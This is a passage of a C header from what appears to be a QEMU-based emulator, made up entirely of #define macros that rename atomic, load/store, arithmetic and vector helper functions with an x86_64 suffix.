cpu_ldl_data_x86_64 #define cpu_ldq_data cpu_ldq_data_x86_64 #define helper_ret_stb_mmu helper_ret_stb_mmu_x86_64 #define helper_le_stw_mmu helper_le_stw_mmu_x86_64 #define helper_be_stw_mmu helper_be_stw_mmu_x86_64 #define helper_le_stl_mmu helper_le_stl_mmu_x86_64 #define helper_be_stl_mmu helper_be_stl_mmu_x86_64 #define helper_le_stq_mmu helper_le_stq_mmu_x86_64 #define helper_be_stq_mmu helper_be_stq_mmu_x86_64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_x86_64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_x86_64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_x86_64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_x86_64 #define cpu_stb_data_ra cpu_stb_data_ra_x86_64 #define cpu_stw_data_ra cpu_stw_data_ra_x86_64 #define cpu_stl_data_ra cpu_stl_data_ra_x86_64 #define cpu_stq_data_ra cpu_stq_data_ra_x86_64 #define cpu_stb_data cpu_stb_data_x86_64 #define cpu_stw_data cpu_stw_data_x86_64 #define cpu_stl_data cpu_stl_data_x86_64 #define cpu_stq_data cpu_stq_data_x86_64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_x86_64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_x86_64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_x86_64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_x86_64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_x86_64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_x86_64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_x86_64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_x86_64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_x86_64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_x86_64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_x86_64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_x86_64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_x86_64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_x86_64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_x86_64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_x86_64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_x86_64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_x86_64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_x86_64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_x86_64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_x86_64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_x86_64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_x86_64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_x86_64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_x86_64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_x86_64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_x86_64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_x86_64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_x86_64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_x86_64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_x86_64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_x86_64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_x86_64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_x86_64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_x86_64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_x86_64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_x86_64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_x86_64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_x86_64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_x86_64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_x86_64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_x86_64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_x86_64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_x86_64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_x86_64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_x86_64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_x86_64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_x86_64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_x86_64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_x86_64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_x86_64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_x86_64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_x86_64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_x86_64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_x86_64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_x86_64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_x86_64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_x86_64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_x86_64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_x86_64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_x86_64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_x86_64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_x86_64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_x86_64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_x86_64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_x86_64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_x86_64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_x86_64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_x86_64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_x86_64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_x86_64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_x86_64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_x86_64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_x86_64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_x86_64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_x86_64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_x86_64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_x86_64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_x86_64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_x86_64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_x86_64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_x86_64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_x86_64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_x86_64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_x86_64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_x86_64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_x86_64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_x86_64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_x86_64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_x86_64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_x86_64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_x86_64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_x86_64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_x86_64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_x86_64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_x86_64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_x86_64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_x86_64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_x86_64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_x86_64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_x86_64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_x86_64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_x86_64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_x86_64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_x86_64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_x86_64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_x86_64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_x86_64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_x86_64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_x86_64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_x86_64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_x86_64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_x86_64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_x86_64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_x86_64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_x86_64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_x86_64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_x86_64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_x86_64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_x86_64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_x86_64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_x86_64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_x86_64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_x86_64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_x86_64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_x86_64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_x86_64 #define helper_atomic_xchgb helper_atomic_xchgb_x86_64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_x86_64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_x86_64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_x86_64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_x86_64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_x86_64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_x86_64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_x86_64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_x86_64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_x86_64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_x86_64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_x86_64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_x86_64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_x86_64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_x86_64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_x86_64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_x86_64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_x86_64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_x86_64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_x86_64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_x86_64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_x86_64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_x86_64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_x86_64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_x86_64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_x86_64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_x86_64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_x86_64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_x86_64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_x86_64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_x86_64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_x86_64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_x86_64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_x86_64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_x86_64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_x86_64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_x86_64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_x86_64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_x86_64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_x86_64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_x86_64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_x86_64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_x86_64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_x86_64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_x86_64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_x86_64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_x86_64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_x86_64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_x86_64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_x86_64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_x86_64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_x86_64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_x86_64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_x86_64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_x86_64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_x86_64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_x86_64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_x86_64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_x86_64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_x86_64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_x86_64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_x86_64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_x86_64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_x86_64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_x86_64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_x86_64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_x86_64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_x86_64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_x86_64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_x86_64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_x86_64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_x86_64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_x86_64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_x86_64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_x86_64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_x86_64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_x86_64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_x86_64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_x86_64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_x86_64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_x86_64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_x86_64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_x86_64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_x86_64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_x86_64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_x86_64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_x86_64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_x86_64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_x86_64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_x86_64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_x86_64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_x86_64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_x86_64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_x86_64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_x86_64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_x86_64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_x86_64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_x86_64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_x86_64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_x86_64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_x86_64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_x86_64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_x86_64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_x86_64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_x86_64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_x86_64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_x86_64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_x86_64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_x86_64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_x86_64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_x86_64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_x86_64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_x86_64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_x86_64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_x86_64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_x86_64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_x86_64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_x86_64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_x86_64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_x86_64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_x86_64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_x86_64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_x86_64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_x86_64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_x86_64 #define cpu_ldub_code cpu_ldub_code_x86_64 #define cpu_lduw_code cpu_lduw_code_x86_64 #define cpu_ldl_code cpu_ldl_code_x86_64 #define cpu_ldq_code cpu_ldq_code_x86_64 #define helper_div_i32 helper_div_i32_x86_64 #define helper_rem_i32 helper_rem_i32_x86_64 #define helper_divu_i32 helper_divu_i32_x86_64 #define helper_remu_i32 helper_remu_i32_x86_64 #define helper_shl_i64 helper_shl_i64_x86_64 #define helper_shr_i64 helper_shr_i64_x86_64 #define helper_sar_i64 helper_sar_i64_x86_64 #define helper_div_i64 helper_div_i64_x86_64 #define helper_rem_i64 helper_rem_i64_x86_64 #define helper_divu_i64 helper_divu_i64_x86_64 #define helper_remu_i64 helper_remu_i64_x86_64 #define helper_muluh_i64 helper_muluh_i64_x86_64 #define helper_mulsh_i64 helper_mulsh_i64_x86_64 #define helper_clz_i32 helper_clz_i32_x86_64 #define helper_ctz_i32 helper_ctz_i32_x86_64 #define helper_clz_i64 helper_clz_i64_x86_64 #define helper_ctz_i64 helper_ctz_i64_x86_64 #define helper_clrsb_i32 helper_clrsb_i32_x86_64 #define helper_clrsb_i64 helper_clrsb_i64_x86_64 #define helper_ctpop_i32 helper_ctpop_i32_x86_64 #define helper_ctpop_i64 helper_ctpop_i64_x86_64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_x86_64 #define helper_exit_atomic helper_exit_atomic_x86_64 #define helper_gvec_add8 helper_gvec_add8_x86_64 #define helper_gvec_add16 helper_gvec_add16_x86_64 #define helper_gvec_add32 helper_gvec_add32_x86_64 #define helper_gvec_add64 helper_gvec_add64_x86_64 #define helper_gvec_adds8 helper_gvec_adds8_x86_64 #define helper_gvec_adds16 helper_gvec_adds16_x86_64 #define helper_gvec_adds32 helper_gvec_adds32_x86_64 #define helper_gvec_adds64 helper_gvec_adds64_x86_64 #define helper_gvec_sub8 helper_gvec_sub8_x86_64 #define helper_gvec_sub16 helper_gvec_sub16_x86_64 #define helper_gvec_sub32 helper_gvec_sub32_x86_64 #define helper_gvec_sub64 helper_gvec_sub64_x86_64 #define helper_gvec_subs8 helper_gvec_subs8_x86_64 #define helper_gvec_subs16 helper_gvec_subs16_x86_64 #define helper_gvec_subs32 helper_gvec_subs32_x86_64 #define helper_gvec_subs64 helper_gvec_subs64_x86_64 #define helper_gvec_mul8 helper_gvec_mul8_x86_64 #define helper_gvec_mul16 helper_gvec_mul16_x86_64 #define helper_gvec_mul32 helper_gvec_mul32_x86_64 #define helper_gvec_mul64 helper_gvec_mul64_x86_64 #define helper_gvec_muls8 helper_gvec_muls8_x86_64 #define helper_gvec_muls16 helper_gvec_muls16_x86_64 #define helper_gvec_muls32 helper_gvec_muls32_x86_64 #define helper_gvec_muls64 helper_gvec_muls64_x86_64 #define helper_gvec_neg8 helper_gvec_neg8_x86_64 #define helper_gvec_neg16 helper_gvec_neg16_x86_64 #define helper_gvec_neg32 helper_gvec_neg32_x86_64 #define helper_gvec_neg64 helper_gvec_neg64_x86_64 #define helper_gvec_abs8 helper_gvec_abs8_x86_64 #define helper_gvec_abs16 helper_gvec_abs16_x86_64 #define helper_gvec_abs32 helper_gvec_abs32_x86_64 #define helper_gvec_abs64 helper_gvec_abs64_x86_64 #define helper_gvec_mov helper_gvec_mov_x86_64 #define helper_gvec_dup64 helper_gvec_dup64_x86_64 #define helper_gvec_dup32 helper_gvec_dup32_x86_64 #define helper_gvec_dup16 helper_gvec_dup16_x86_64 #define helper_gvec_dup8 helper_gvec_dup8_x86_64 #define helper_gvec_not helper_gvec_not_x86_64 #define helper_gvec_and helper_gvec_and_x86_64 #define helper_gvec_or helper_gvec_or_x86_64 #define helper_gvec_xor helper_gvec_xor_x86_64 #define helper_gvec_andc helper_gvec_andc_x86_64 #define helper_gvec_orc helper_gvec_orc_x86_64 #define helper_gvec_nand helper_gvec_nand_x86_64 #define helper_gvec_nor helper_gvec_nor_x86_64 #define helper_gvec_eqv helper_gvec_eqv_x86_64 #define helper_gvec_ands helper_gvec_ands_x86_64 #define helper_gvec_xors helper_gvec_xors_x86_64 #define helper_gvec_ors helper_gvec_ors_x86_64 #define helper_gvec_shl8i helper_gvec_shl8i_x86_64 #define helper_gvec_shl16i helper_gvec_shl16i_x86_64 #define helper_gvec_shl32i helper_gvec_shl32i_x86_64 #define helper_gvec_shl64i helper_gvec_shl64i_x86_64 #define helper_gvec_shr8i helper_gvec_shr8i_x86_64 #define helper_gvec_shr16i helper_gvec_shr16i_x86_64 #define helper_gvec_shr32i helper_gvec_shr32i_x86_64 #define helper_gvec_shr64i helper_gvec_shr64i_x86_64 #define helper_gvec_sar8i helper_gvec_sar8i_x86_64 #define helper_gvec_sar16i helper_gvec_sar16i_x86_64 #define helper_gvec_sar32i helper_gvec_sar32i_x86_64 #define helper_gvec_sar64i helper_gvec_sar64i_x86_64 #define helper_gvec_shl8v helper_gvec_shl8v_x86_64 #define helper_gvec_shl16v helper_gvec_shl16v_x86_64 #define helper_gvec_shl32v helper_gvec_shl32v_x86_64 #define helper_gvec_shl64v helper_gvec_shl64v_x86_64 #define helper_gvec_shr8v helper_gvec_shr8v_x86_64 #define helper_gvec_shr16v helper_gvec_shr16v_x86_64 #define helper_gvec_shr32v helper_gvec_shr32v_x86_64 #define helper_gvec_shr64v helper_gvec_shr64v_x86_64 #define helper_gvec_sar8v helper_gvec_sar8v_x86_64 #define helper_gvec_sar16v helper_gvec_sar16v_x86_64 #define helper_gvec_sar32v helper_gvec_sar32v_x86_64 #define helper_gvec_sar64v helper_gvec_sar64v_x86_64 #define helper_gvec_eq8 helper_gvec_eq8_x86_64 #define helper_gvec_ne8 helper_gvec_ne8_x86_64 #define helper_gvec_lt8 helper_gvec_lt8_x86_64 #define helper_gvec_le8 helper_gvec_le8_x86_64 #define helper_gvec_ltu8 helper_gvec_ltu8_x86_64 #define helper_gvec_leu8 helper_gvec_leu8_x86_64 #define helper_gvec_eq16 helper_gvec_eq16_x86_64 #define helper_gvec_ne16 helper_gvec_ne16_x86_64 #define helper_gvec_lt16 helper_gvec_lt16_x86_64 #define helper_gvec_le16 helper_gvec_le16_x86_64 #define helper_gvec_ltu16 helper_gvec_ltu16_x86_64 #define helper_gvec_leu16 helper_gvec_leu16_x86_64 #define helper_gvec_eq32 helper_gvec_eq32_x86_64 #define helper_gvec_ne32 helper_gvec_ne32_x86_64 #define helper_gvec_lt32 helper_gvec_lt32_x86_64 #define helper_gvec_le32 helper_gvec_le32_x86_64 #define helper_gvec_ltu32 helper_gvec_ltu32_x86_64 #define helper_gvec_leu32 helper_gvec_leu32_x86_64 #define helper_gvec_eq64 helper_gvec_eq64_x86_64 #define helper_gvec_ne64 helper_gvec_ne64_x86_64 #define helper_gvec_lt64 helper_gvec_lt64_x86_64 #define helper_gvec_le64 helper_gvec_le64_x86_64 #define helper_gvec_ltu64 helper_gvec_ltu64_x86_64 #define helper_gvec_leu64 helper_gvec_leu64_x86_64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_x86_64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_x86_64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_x86_64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_x86_64 